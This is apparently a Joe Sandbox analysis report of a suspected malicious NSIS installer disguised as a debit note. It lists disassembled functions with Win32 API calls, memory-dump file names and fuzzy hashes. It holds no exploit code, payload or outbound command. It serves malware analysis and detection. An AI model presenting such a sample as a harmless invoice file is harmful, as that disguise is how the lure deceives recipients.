Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5757bc3562e7fd28978ac45cc7d9905cf04a78579febaaeea46e845b0a190490
Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
Opcode Fuzzy Hash: 5757bc3562e7fd28978ac45cc7d9905cf04a78579febaaeea46e845b0a190490
Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
Opcode Fuzzy Hash: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18

Function 00405A3E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,Antegrade\Fravristelse213.Sto226,?,00405AB2,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405A4C
CharNextW.USER32(00000000), ref: 00405A51
CharNextW.USER32(00000000), ref: 00405A69

Strings

Antegrade\Fravristelse213.Sto226, xrefs: 00405A3F

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CharNext
String ID: Antegrade\Fravristelse213.Sto226
API String ID: 3213498283-844488938
Opcode ID: 21c909a7070704e5dbb7e9601562fce6107f8a8183e885fdad65ddb46c3d8f9e
Instruction ID: 3370e48302fb4b38b4c5194c943d3a4fd1b010f94388a0a3dcc183d660c6baaf
Opcode Fuzzy Hash: 21c909a7070704e5dbb7e9601562fce6107f8a8183e885fdad65ddb46c3d8f9e
Instruction Fuzzy Hash: 2CF09651F10B2295DF3177A44CC5E7B57B8EB58760B04853BE601B72C0E3B84D818F9A

Function 00405993 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00405999
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 004059A3
lstrcatW.KERNEL32(?,00409014), ref: 004059B5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405993

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5

WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: 31d36f602dcab66d188b5b3b2e777ee9953d6626e675800b0e1fc5d87eda0f2f
Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
Opcode Fuzzy Hash: 31d36f602dcab66d188b5b3b2e777ee9953d6626e675800b0e1fc5d87eda0f2f
Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9

Function 00405A9B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55

Part of subcall function 00405A3E: CharNextW.USER32(?,?,Antegrade\Fravristelse213.Sto226,?,00405AB2,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405A4C
Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69

lstrlenW.KERNEL32(Antegrade\Fravristelse213.Sto226,00000000,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"), ref: 00405AF4
GetFileAttributesW.KERNEL32(Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,00000000,Antegrade\Fravristelse213.Sto226,Antegrade\Fravristelse213.Sto226,?,?,77222EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,77222EE0), ref: 00405B04

Strings

Antegrade\Fravristelse213.Sto226, xrefs: 00405AA1, 00405AA6, 00405AAC, 00405AED, 00405AF3, 00405AFB, 00405B03

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: Antegrade\Fravristelse213.Sto226
API String ID: 3248276644-844488938
Opcode ID: 7ce201bf88eaf48813c7c66b2d703cb578c55b534477fae0be54905458882fdd
Instruction ID: d8ec0bb6260b8bc6bf9377f80a5ae864fb4799106b1aa2bc96123f944ca7c929
Opcode Fuzzy Hash: 7ce201bf88eaf48813c7c66b2d703cb578c55b534477fae0be54905458882fdd
Instruction Fuzzy Hash: 61F0A425305E5259EA22323A5C85AAF3548CF82364759077FF852B22D2DB3C8D43DDBE

Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405195
CallWindowProcW.USER32(?,?,?,?), ref: 004051E6

Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8

Strings

, xrefs: 00405176

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69

Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
CloseHandle.KERNEL32(?), ref: 004056F5

Strings

Error launching installer, xrefs: 004056D6

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D

Function 0040388A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77222EE0,00403861,77223420,0040366C,?), ref: 004038A4
GlobalFree.KERNEL32(?), ref: 004038AB

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9

Function 004059DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 004059E5
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 004059F5

Strings

C:\Users\user\Desktop, xrefs: 004059DF

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
